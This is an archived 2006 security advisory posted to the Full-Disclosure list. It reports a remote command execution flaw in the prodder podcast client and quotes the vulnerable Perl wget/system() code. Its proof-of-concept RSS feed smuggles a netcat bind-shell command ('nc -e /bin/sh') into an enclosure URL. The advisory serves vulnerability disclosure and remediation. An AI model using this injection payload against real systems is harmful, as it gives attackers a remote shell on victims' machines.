OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
[Full-disclosure] Prodder Remote Arbitrary Command Execution

From: RedTeam Pentesting (releaseredteam-pentesting.de)
Date: Mon May 22 2006 - 05:18:22 CDT


Advisory: Prodder Remote Arbitrary Command Execution

RedTeam identified a security flaw in prodder which makes it possible
for a malicious podcast server to execute arbitrary shell commands on
the victim's client.

Details
=======

Product: Prodder
Affected Versions: All versions up to prodder-0.4
Fixed Versions: prodder-0.5
Vulnerability Type: Remote arbitrary command execution
Security-Risk: high
Vendor-URL: http://prodder.sourceforge.net/
Vendor-Status: informed, fixed
Advisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2006-002.txt
Advisory-Status: public
CVE: GENERIC-MAP-NOMATCH
CVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH

Introduction
============

Prodder is a command-line based Podcast client (or aggregator, receiver,
doohickey) written in Perl that runs on just about any *n*x system. It
implements a few very useful features that are lacking in many of the
existing tools, while remaining simple and light-weight.

(from prodder homepage)

Podcasting is the distribution of multimedia files over the internet.
Normally, a server is providing an RSS or Atom XML feed describing where
to get the multimedia files. The client parses the feed and may then
download the desired files.

More Details
============

When prodder is used to fetch a podcast, prodder will extract the URL of
the audio-file from the XML-file the server provides. Prodder then uses
Wget to fetch the file. The source code looks as follows:

[...]
446 # Actually get the file
447 my $wget_cmd = "wget -qc -a '$conf{'errorfile'}' "
448 . "--tries=3 --timeout=20 --random-wait '$enc_url' -P '$outdir'";
449
450 # Background the wgets if needed - this will assume
451 # the downloads dont fail (once they've started)
452 $wget_cmd .= " --background" if $conf{'background'};
453
454
455
456 print "Fetching item ($enc_url)... ";
457 if (! system($wget_cmd))
[...]

Unfortunately, $enc_url which holds the URL in line 448 is never
properly sanitized, so it is possible to include arbitrary shell
commands in the URL which will then be executed using system() (see line
457).

Proof of Concept
================

A minimal malicious server rss feed may look as follows:

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl"?>
<rss version="2.0">
<channel>
    <title>RedTeam Pentesting Example Malicious Server Feed</title>

    <item>
        <enclosure url="http://www.example.com/example.mp3'; nc -e /bin/sh -l
-p 1337 &amp; ';#'"
         length="241734" type="audio/mpeg" />
    </item>
</channel>
</rss>

The URL above will open port 1337 via netcat on the victim's computer
and bind a shell to it. This is just one example of how to exploit the
vulnerability, as arbitrary commands can be included in the URL, but it
should illustrate the point.

Workaround
==========

Do not use prodder with untrusted servers.

Fix
===

Upgrade to prodder-0.5 immediately[1].

Security Risk
=============

High, because arbitrary shell commands can be executed on the victim's
computer with the privileges of prodder (normally the user's
privileges).

History
=======

2006-05-18 Discovery of the problem
2006-05-19 Notification of the author
2006-05-19 Initial response of the author
2006-05-20 Fixed version of prodder is released
2005-05-22 Public release of the advisory without CVE
           number because of public release by the
           author. CVE will be appended when available.

References
==========

[1] http://prdownloads.sourceforge.net/prodder/prodder-0.5.tgz?download

RedTeam
=======

RedTeam Pentesting is offering individual penetration tests, short
pentests, performed by a team of specialised IT-security experts.
Hereby, security weaknesses in company networks are uncovered and can be
repaired immediately.

As there are only few experts in this field, RedTeam wants to share its
knowledge and enhance the public knowledge with research in security
related areas. The results are made available as public security
advisories.

More information about RedTeam can be found at
http://www.redteam-pentesting.de.

--
RedTeam Pentesting Tel.: +49-(0)241-963 1300
Dennewartstr. 25-27 Fax : +49-(0)241-963 1304
52068 Aachen http://www.redteam-pentesting.de

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iQEVAwUARHGP/9G/HXWsgFSuAQKx4gf+MJsyXTkRlusuzVf6t0l81e53Ak5ubBAk
77VJa65i7EHUcSc3xmHM7teAuBEtkNwyGdcrfusCbje/oYUO9LI13vHHB2SK3+kZ
f0jC5p7qkUfuPFEqKIwbNwmauX2CeRMAS8X6sHzICP1uErFOFlYvrgX7HWvbU1lF
Kx7Mvo3RN7I04+7gGQQtk2CMFrpL7RWiZCWZd+SQtR/6RTntnnY/tBYttAgsERIu
q1MJOF5bLZp1cCpf0Il77BbwaCFHYdSyGi/PEciUicYV1Sghpn0mAoQNE1CRBYJT
BPALpyVTBrTIIE64LTRW4F6lasA36zDZicehQs2eXbW6VVH7XETIFw==
=fuuT
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/